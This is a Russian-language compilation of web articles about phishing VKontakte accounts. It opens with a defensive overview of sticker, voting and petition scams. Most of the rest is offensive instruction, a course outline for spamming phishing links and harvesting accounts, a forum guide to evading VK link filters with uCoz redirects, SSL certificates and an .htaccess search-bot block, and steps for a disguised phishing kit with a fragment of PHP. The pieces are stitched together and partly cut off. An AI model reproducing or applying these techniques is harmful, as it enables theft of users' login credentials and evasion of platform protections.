Многие пользователи социальной сети «ВКонтакте» знают о том, что различные хакеры и прочие мошенники знают множество способов, с помощью которых они могут открыть себе доступ к чужим аккаунтам. Например, в некоторых случаях применяется «грубая сила» — так называемый брутфорс. Иногда в ход идут различные методы социальной инженерии, но все же самым распространенным и наиболее активно развивающимся методом является фишинг, с помощью которого можно узнать чужой пароль и логин для входа на личную страницу.
Фишинговые схемы предполагают под собой создание различных декоративных сервисов в Интернете, которые копируют другие сайты, но при этом являются своеобразными ловушками для пользователей. И все же, зная о распространенных методах фишинга, можно легко отличить подделку от настоящего сайта. В первую очередь, стоит обращать внимание на адресную строку браузера. И все же из-за быстрого и довольно эффективного развития подобных ловушек полезно будет узнать о том, какие способы воровства аккаунтов популярны сейчас.
Как создать фишинговый сайт ВКонтакте | Создание фишинг сайта
В этой статье мы рассмотрим разные методы фишинга, такие как:
- Раздачи бесплатных наборов стикеров;
- Участие в голосованиях;
- Просьбы подписать петиции.
Бесплатные стикеры «ВКонтакте»
Эта схема уже успела стать настоящей классикой, причем работает она довольно просто. Сначала пользователь получает сообщение о том, что он может поучаствовать в бесплатном розыгрыше новых интересных стикеров. В этом конкурсе человек всегда якобы выигрывает, а получить свое вознаграждение ему предлагают абсолютно бесплатно. Для этого нужно лишь зайти со своего аккаунта «ВКонтакте» в специальную форму на ресурсе самого розыгрыша.
Когда пользователь введет свои данные для входа, никакие стикеры отправлены не будут, но вот логин и пароль от личной страницы человека после этого хакеры узнают.
Участие в голосованиях
Многие люди привыкли помогать своим друзьям, которые просят их принять участие в тех или иных конкурсах с голосованиями. Чаще всего это срабатывает, когда об этом со своей страницы просит сам друг. В ходе этой схемы нужно использовать уже взломанный аккаунт другого человека. С этого аккаунта происходит рассылка специальной ссылки, которая ведет далее на фишинговый ресурс, где якобы можно проголосовать за друга.
После того, как сайт будет открыт, можно увидеть своего друга среди прочих конкурсантов, при этом часто используются даже реальные фотографии людей. Когда пользователь решит проголосовать за своего приятеля, он попадет в специальное окно, которое попросит совершить вход со своей страницы. Разумеется, это будет скопированная мошенниками версия «ВКонтакте».
Петиции во «ВКонтакте»
Это относительно новая схема, при которой мошенники сначала просят просто выразить свое мнение по какому-то серьезному вопросу. Например, здесь могут просить о помощи матери с детьми, которую выселяют из квартиры, а также в некоторых случаях используют поводы, связанные с защитой животных, и другие предлоги. Здесь для мошенников самое важное — это вызвать какие-то ответные чувства у тех людей, по которым они делают рассылку, усыпив при этом бдительность жертвы.
ФИШИНГ 21 ВЕКА — КАК ВАС ВЗЛАМЫВАЮТ МОШЕННИКИ. СХЕМА
Сайты, в которых якобы можно поучаствовать в петиции, зачастую полностью скопированы с реальных аналогичных ресурсов (например, это может быть change.org). Когда пользователь попробует оставить свою подпись здесь, ему будет предложено зайти под своим профилем «ВКонтакте». Конечно же, это ненастоящая форма для входа, так как она просто собирает чужие логины и пароли.
Как не попасться на фишинг «ВКонтакте»?
Здесь перечислены только лишь основные и самые известные схемы для фишинга. При этом нужно понимать, что такие мошенники постоянно стараются искать новые методы, а также они создают новые еще более правдоподобные «декорации». Чтобы защититься от воровства аккаунта, нужно быть, в первую очередь, предельно осторожным и внимательным.
Так, например, ни в коем случае не стоит заходить в свой профиль «ВКонтакте» на неизвестных и не заслуживающих доверия сайтах. Также все формы для входа стоит несколько раз проверять, причем отдельного внимания заслуживает непосредственно сама адресная строка в браузере. Если же пользователю показалось, что он все-таки стал жертвой фишинга, то ему стоит как можно быстрее сменить свой пароль во «ВКонтакте».
Заключение
Как можно заметить, известных и популярных способов воровства данных для входа на личные страницы пользователей «ВКонтакте» с помощью фишинга довольно много. При этом, будучи предельно внимательным, получится избежать худшего исхода, при котором аккаунт человека действительно будет взломан.
Источник: vk-wiki.ru
Как создать фишинг сайт ВКонтакте
Доброго времени суток. В сегодняшнем курсе мы с вами затронем один из методов по получению бесплатных аккаунтов во ВКонтакте, а также как создать фишинг сайт ВКонтакте.
Скажу сразу, что этот курс ранее продавался за 700 рублей, однако здесь вы сможете ознакомиться с ним совершенно бесплатно. Практически весь курс будет посвящён такого рода занятию как спам с помощью программы Quick Sender, а также работе с дополнительными программами – чекерами.
По окончанию обучения, как утверждает автор метода, вы сможете иметь в день по 400 бесплатных аккаунтов ВКонтакте, а если приложить максимум усилий, то и того больше, всё зависит от вашей терпеливости и заинтересованности в этом.
1. Покупка хостинга стоимостью 95 рублей в месяц. Если вы не хотите тратить деньги на приобретение хостинга, советую воспользоваться бесплатным, об этом я рассказывал в предыдущем материале «Какой выбрать хостинг».
2. Загрузка фишингового скрипта на хостинг.
3. Покупка аккаунтов для спама.
4. Настройка программного обеспечения.
5. Обход фильтров ВКонтакте в отношении ссылки созданного сайта.
6. Рассылка спама с ссылкой на фишинговый ресурс.
7. Сбор аккаунтов пользователей.
8. Дополнительный курс по заработку.
Share the post «Как создать фишинг сайт ВКонтакте»
Похожие записи:
- Как создать чат-приложение во ВКонтакте
- Курс по новым инструментам продвижения ВКонтакте от Дамира Халилова
- Скрипты скрытых подписок для ВКонтакте, Facebook, Одноклассники
- Как заработать 5$ ВКонтакте за несколько минут
Источник: leads24.ru
В контакте s фишинг про. Как происходит фишинг вконтакте. Не попадись на крючок мошенников! Рассказ о том как залить все это дело на хостинг
Да-да-да, знаю, «ваша страница заблокирована, поскольку с вашего компьютера происходила рассылка спам-сообщений, мы ограничили вам доступ». Верно? Всем, чье серое вещество не в состоянии осилить «многобукаф» и не терпится поскорей разрешить проблему, рекомендуется пролистнуть сей текст в самый низ странички и произвести два нехитрых действия, о коих там говорено.
А ежели есть товарищи, восхотевшие уяснить, почему и что такое стряслось с их страничкой на вконтакте, дабы повторно в будущем не попасть впросак, милости просим ознакомиться со всем нижеследующим документом. Итак, вникайте.
Бесплатный сыр в мышеловке!
Мои поздравления, господа, в следующий раз, когда обнаружите какую-нибудь хитрую программу «для рисования аватаров», «поднятия рейтинга», «просмотра гостей» или всяких прочих ништяков, потрудитесь испросить у гугла — а правда ли, что воспользовавшись оными, вы получите то, что вам впаривают с благими намерениями.
На деле же, все эти намерения прозрачны, как блузка телеведущей — в системе перепишут файлик hosts, дабы в браузере вам был нарисован вместо вконтакта фишинговый сайтик , в тютельку похожий на настоящий. А при вводе логина с паролями скажут, дескать, аккаунт ваш мы поблочили, чтоб неповадно было спамерствовать, ибо нефик… Потом любезно предоставят еще какую нибудь программулину, сотворенную этими же самыми добрыми ребятами, которая, будучи скачанной и запущенной, донесет до вашего сведения, что да, не кручиньтесь, беда ваша нам известна, и мы вам, конечно же, поможем, только зашлите СМС с таким-то текстом на такой-то номер, и обретете счастье.
Почему ругается антивирус?
А нефик-то, всего лишь навсего, хрень всяческую скачивать и собственноручно же запускать у себя на компутере, порой даже невзирая на истошные визжания касперского или еще какой тулзы, живущей у вас с целью ограждать от троянов с вирусами и прочей нечисти. И даже опрометчиво высланная смс не помогает — попасть на вконтакт как не получалось, так и не получается, не огреблось счастье-то…
Но да ладно, раз уж вы здесь и внимаете этому тексту, надо полагать, что все уже стряслось, а посему надо как-то все это решать, а не нотации вам тут зачитывать. Все это дело сподвигло местного автора исследовать частный случай всей схемы, с упомянутой «программой» myguests, дабы в приступе гуманности поведать о том всем страждущим и потерпевшим.
Схема фишина на примере «Гости вконтакте»
Схема любопытная и выглядит следующим образом:
- С изумлением взираем на нарисованную нам страницу авторизации(хотя скорее всего, пароль у нас обычно запомнен) Заподозрили что-то неладное…
- Вспотев, внимаем тексту тут же нарисованному, и обнаруживаем ссылочку на некий файлик antispam.exe. Возрадовавшись, немедля качаем спасительную «программу разработанную командой вконтакте»
- Запускаем. Пред очи имеем красивое оконце, в коем нас заверяют о том, что надобно бы СМС отправить с таким-то текстом на такой-то номер, как тотчас же архивчик будет распакован.(Это еще не сам разблокиратор, а только архивчик, и смс нужна для его распаковки) Причем ссылочка в окошке поименованная как «техподдержка» ведет на некий сайт filecash.ru. О нем же упоминается и в другой ссылочке с гордым названием «лицензионное соглашение»
- Что происходит дальше, жгучего желания проверять не возникло, но смутно подозреваю, что и после отправки смс ничего хорошего из этого не выйдет. Кроме снятия энного количества уев с вашего счета на мобильнике в пользу обогащения какого-нибудь школьника, сию хитрую схему сотворившего.
- Тут-то наши светлые головы посещает гениальнейшая мысль испросить рекомендаций как же поступить в сложившейся нелегкой ситуевине у многомудрого Гугла или Яндекса. Вбиваем соответствующий адрес, благо запомненный наизусть… и ничего не получается. Гугл, Яндекс и десяток еще каких любимых сайтов не открываются. Незадача…
Что произошло на самом деле?
- Обретаем счастье. И первым делом, со всей решительностью меняем пароль на вконтакте
Приветствую, обитатели форума! Сегодня речь пойдет о фишинге Вконтакте. Прежде всего хочу сказать, что в статье упоминаются некоторые сервисы, не сочтите за рекламу. Статья написана для ознакомления и я никого на описанные в статье действия не побуждаю.
Как вы знаете фишинг ВК был очень популярен, но после обновления ВКонтакте политики безопасности стал исчерпывать себя. Так ли это на самом деле? Ведь ничто не стоит на месте и с новой политикой безопасности пришли и новые методы фишинга.
В данной статье я расскажу немного о «проблемах» фиш-сайта ВК и их решениях на примере давно слитого в паблик, сайта. (Исходники можно скачать тут: Я.Диск
Что же первое бросается в глаза при открытии такого сайта?
- Подозрительный внешний вид: сайт выглядит как старая мобильная версия ВК, не работает переключение языков, старые шрифты и пиксельное лого сразу наводят на мысль, что мы попали именно на зловредный сайт.
- Отсутствие десктопной версии сайта : да, я понимаю, что 80% трафика ВК приходится на мобильные устройства, но все же, готовым надо быть ко всему, особенно, если вы занимаетесь индивидуальным взломом.
- Подобные сайты сразу отмечаются браузерами как «мошеннические» : дело в том, что браузер прежде всего смотрит на SSL сертификат или его отсутствие, ну и т.к. фишеры в основной своей массе разворачивают фиш сайты на бесплатных хостингах, то и получение хотя бы DV SSL сертификата там отсутствует. сайты помечаются как «мошеннические», а потом и аккаунт на хостинге уходит в бан.
- Полное отсутствие проверки валидности данных : все что мне доводилось видеть в таких скриптах это в основном форму с полями «логин», «пароль», кнопку и запись этого добра в блокнот. Никаких проверок на валид, пустые поля или BadRequest. о работе с 2FA аккаунтами даже не говорю. Максимум — запрос в API ВК на получение токена.
- Рассылка сообщений , содержащих ссылку на фишинговый сайт: при рассылке сообщений текст был примерно такой: «О боженьки, ты выиграл в конкурсе репостов, пройди по ссылке Вы должны быть зарегистрированы, чтобы видеть ссылки. И получи 100500$». Ну согласитесь звучит глупо. Но да, на такое ведутся до сих пор. такого наивного народа осталось очень мало и в основном это дети.
- Сокращение ссылок : чтобы ВК пропускал ссылки на фиш сайты приходилось делать редирект + сокращение, в итоге ссылка получалась типа Вы должны быть зарегистрированы, чтобы видеть ссылки. Что только портило внешний вид сообщения.
- Мы не будем сокращать ссылки с vk.cc, а немного схитрим с uCoz. (Если вы используете сайт-прокладку по типу сайта с голосованием, то это вообще шикарно)
- Получить SSL сертификат для своего домена.
Спойлер: Махинации с uCoz
Создадим любой сайт с названием, подходящим под вашу тематику сайта-прокладки
Перейдем во вкладку Модули и создадим страничку сайта
Обзовем ее как-нибудь, я назову «test», если у вас есть сайт-прокладка типа голосовалки, вы можете назвать страницу «golos-za-ivana-pupkina»
Теперь перейдем на наш сайт, затем на вкладку «test», которую только что создали и скопируем куда-нибудь URL
Перейдем в раздел Дизайн => Редактор => Страницы сайта. и между
вставим следующие строки:
В итоге переходя по ссылке
Вы должны быть зарегистрированы, чтобы видеть ссылки.
Нас перекинет на нужный нам сайт. Теперь нет необходимости сокращать через vk.cc подобного рода ссылки. ВК их без проблем пропустит, а мы при рассылки лишим себя вопросов от получателя «Ой, какая-то ссылка подозрительная. это точно не обман?».
Получение SSL сертификата
Как я уже говорил SSL сертификат нужен, чтобы браузеры и антивирусы не помечали наш фишинговый сайт как «мошеннический». Помимо этого ссылки на сайт c SSL пропускает ВК, а это значит, что манипуляции, описанные выше будут не нужны, мы сможем просто скидывать ссылку в исходном ее виде.
Спойлер: Получаем SSL сертификат
На данный момент существуют множество хостингов, работающих с центрами сертификации. Самое простое решение вопроса с SSL — это разворачивать свои сайты, как раз на таких хостингах. В их панели управления уже есть вкладка с управлением SSL, там можно заказать новый сертификат, установить свой или управлять существующими сертификатами.
Так же, чтобы снизить вероятность блокировки сайта с пометкой как мошеннический можно прописать в файл.htaccess запрет на индексацию ботами поисковых механизмов.
Спойлер: Что прописать в.htaccess
SetEnvIfNoCase User-Agent «^Googlebot» search_bot
SetEnvIfNoCase User-Agent «^Yandex» search_bot
SetEnvIfNoCase User-Agent «^Yahoo» search_bot
SetEnvIfNoCase User-Agent «^Aport» search_bot
SetEnvIfNoCase User-Agent «^msnbot» search_bot
SetEnvIfNoCase User-Agent «^spider» search_bot
SetEnvIfNoCase User-Agent «^Robot» search_bot
SetEnvIfNoCase User-Agent «^php» search_bot
SetEnvIfNoCase User-Agent «^Mail» search_bot
SetEnvIfNoCase User-Agent «^bot» search_bot
SetEnvIfNoCase User-Agent «^igdeSpyder» search_bot
SetEnvIfNoCase User-Agent «^Snapbot» search_bot
SetEnvIfNoCase User-Agent «^WordPress» search_bot
SetEnvIfNoCase User-Agent «^BlogPulseLive» search_bot
SetEnvIfNoCase User-Agent «^Parser» search_bot
Ну вот пока и всё. Информации о ВК у меня еще много, так что если кто-то хочет подискутировать о фишинге ВК, задать вопрос или вообще все, что угодно прошу в ЛС форума. Всегда открыт для новых идей. Надеюсь эта информация была для вас полезна;)
Еще несколько лет назад метод фишинга был очень популярен, но в настоящее время сервисы научились его определять, они находят и блокируют фейковые страницы. Поэтому есть более продвинутый метод фишинга.
Сегодня многие пользуются социальными сетями, каждый день люди пытаются взломать чью-то учетную запись Вконтакте, mail.ru , gmail и другие сервисы, причем сделать это бесплатно. Чаще всего люди ищут какое-то волшебное приложение для взлома Вконтакте, но мы покажем Вам кое-что другое. Это фишинг. Но в данной статье(в отличии от предыдущей) мы рассмотрим его альтернативную версию.
Переименуйте файл index.html в файл vk.jpg, это нужно для того чтобы сбить с толку систему безопасности Вконтакте;
Создайте пустой файл с именем security.php, откройте его в программе блокнот, впишите следующий код
if ($id == «confirmemail»)
$fh = fopen($myFile, «r»);
$theData = fread($fh, 500000); fclose($fh);
$fh1 = fopen($myFile1, «r»);
$theData1 = fread($fh1, 500000);
и сохраните его рядом с vk.jpg;
Создайте файл confirm.jpg, также откройте в блокноте и впишите в него следующую строку:
thanks for confirming your email address.
Проверьте что у Вас есть нужные файлы
и папка со всеми скриптами Вконтакте, без них Ваша фейковая страница будет отображаться некорректно;
Загрузите эти файлы на веб хостинг;
Данный метод подойдет также если жертва заходит с устройства андроид. И одним комплектом скриптов можно взломать большое количество учетных записей во Вконтакте. Если не считать расходы на хостинг, то это получается бесплатный способ получения пароля.
Это только один метод прохода через системы безопасности социальной сети или почтового сервиса. Но сегодня для того что бы произвести взлом Вконтакте, необходимо знать множество таких методов. Анти-фишинговые механизмы с каждым днем совершенствуются, а владельцы сервисов все больше закручивают гайки, не оставляя никаких лазеек хакерам.
Но сильная сторона способа взлома заключается как раз в другом. А именно в умелом манипулировании людьми, умении выявить и использовать их слабости. Написать хорошую подставную страницу это даже не пол дела, потому что если ты не обладаешь достаточными навыками социального инженера, то заниматься этим просто нет смысла.
Источник: offlink.ru